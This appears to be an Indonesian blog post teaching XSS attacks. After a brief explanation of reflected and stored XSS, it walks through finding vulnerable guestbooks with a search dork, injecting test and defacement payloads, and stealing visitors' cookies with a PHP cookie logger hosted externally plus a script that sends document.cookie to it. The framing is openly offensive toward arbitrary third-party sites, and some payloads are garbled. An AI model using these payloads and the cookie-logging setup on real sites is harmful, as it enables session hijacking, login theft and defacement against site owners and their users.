XSS
Injections
XSS
merupakan sebuah serangan yang termasuk dalam jenis injeksi kode.
Penyerangan ini dilakukan dengan cara memasukkan kode-kode html ke
dalam suatu situs. Akibat yang bisa ditimbulkan dari serangan ini
antara lain penyerang dapat memotong keamanan dari sisi klien,
mendapatkan informasi yang bersifat case sensitif, atau bisa saja
menyisipkan aplikasi berbahaya ke dalam web yang diserang.
Ada
dua tipe serangan XSS:
Reflected
atau nonpersistent
tipe
serangan XSS ini merupakan tipe serangan yang paling umum dilakukan
oleh penyerang. Cara kerjanya adalah penyerang menggunakan tautan
pada media social engineering agar tautan yang sudah disisipi kode
berbahaya ini diklik oleh pengguna. Jika tautan berbahaya ini diklik
oleh pengguna maka penyerang akan mendapatkan cookie pengguna yang
nantinya akan digunakan untuk membajak session pengguna. Pertahanan
untuk menghadapi serangan ini adalah dengan melakukan validasi input
sebelum menampilkan data dan jangan mudah percaya pada apapun yang
dikirim pengguna, terutama jika itu merupakan sebuah tautan.
Stored
atau Persistent
serangan
jenis ini jarang ditemui tetapi memiliki dampak serangan yang besar.
Sebuah serangan pada stored XSS dapat berakibat pada seluruh
pengguna. Stored XSS terjadi pada saat pengguna diizinkan untuk
memasukkan data yang akan ditampilkan kembali.
Contoh
penggunaan XSS injector
masukkan
kata kunci inurl:.com/guestbook ke dalam mesin pencari google,
keyword tersebut digunakan untuk mencari alamat website
.com/guestbook
setelah
pencarian keluar, lalu pilih website mana yang akan kita jadikan
sasaran XSS injector, setelah lakukan pengetesan dengan cara
memasukkan kode dibawah ini ke dalam textfield yang ada dibagian
guestbook.
<script>alert(“/XSS”/)</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>;
<script>alert(String.fromCharCode(88,83,83))</script>
<body
onload=alert(‘XSS’)>
<script
type=text/javascript>alert(“XSS”)</script>
jika
setelah di enter muncul pop up yang berisi tulisan XSS, itu artinya
situs tersebut siap untuk kita serang.
Beberapa
jenis serangan yang bisa kita lakukan adalah melakukan defacement
dan mencuri cookies dari website tersebut.
Untuk
melakukan defacement kita dapat memasang kode
<meta
http-equiv=”refresh”
content=”0;url=http://www.tinypic.com/deface.png” />
atau
<script>window.open(
“http://www.tinypic.com/deface.png” )</script>
sedangkan
untuk melakukan pencurian cookies. Jika kita memasukkan script
berikut ini <script>alert(document.cookie)</script> ,
kita dapat mencuri login information dari situs yang kita serang.
Namun kita harus menggunakan cookie editor untuk bisa menggunakan
cookie yang tercuri tersebut.
Alternatif
lain adalah dengan membuat cookie logger sendiri. Buat sebuah file
dengan nama cookielogger.php. Masukkan script dibawah ini:
<?php
$cookie
= $_GET['cookie'];
$log = fopen(“cookies.txt”,
“a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>
setelah
itu buat sebuah file kosong dengan nama cookies.txt. File kosong ini
nantinya akan digunakan untuk menuliskan hasil cookie yang kita
curi. Setelah itu upload kedua file ini kedalam media hosting yang
mendukung php seperti ripway.com, 000webhost.com dan lain-lain.
Kemudian
sisipkan kode berikut ke situs yang akan diserang
<script>alert(namalogin.namamediahostingkamu.com/cookielogger.php)</script>
atau
<script>document.location=’namalogin.namamediahostingkamu.com/cookielogger.php?
cookie=’+escape(document.cookie)
</script>
setelah
memasukkan kode tersebut maka cookie akan tertulis di file
cookies.txt yang kita hosting ke dalam media hosting kita. Login
kedalam media host kemudian buka file cookies.txt
0 komentar:
Post a Comment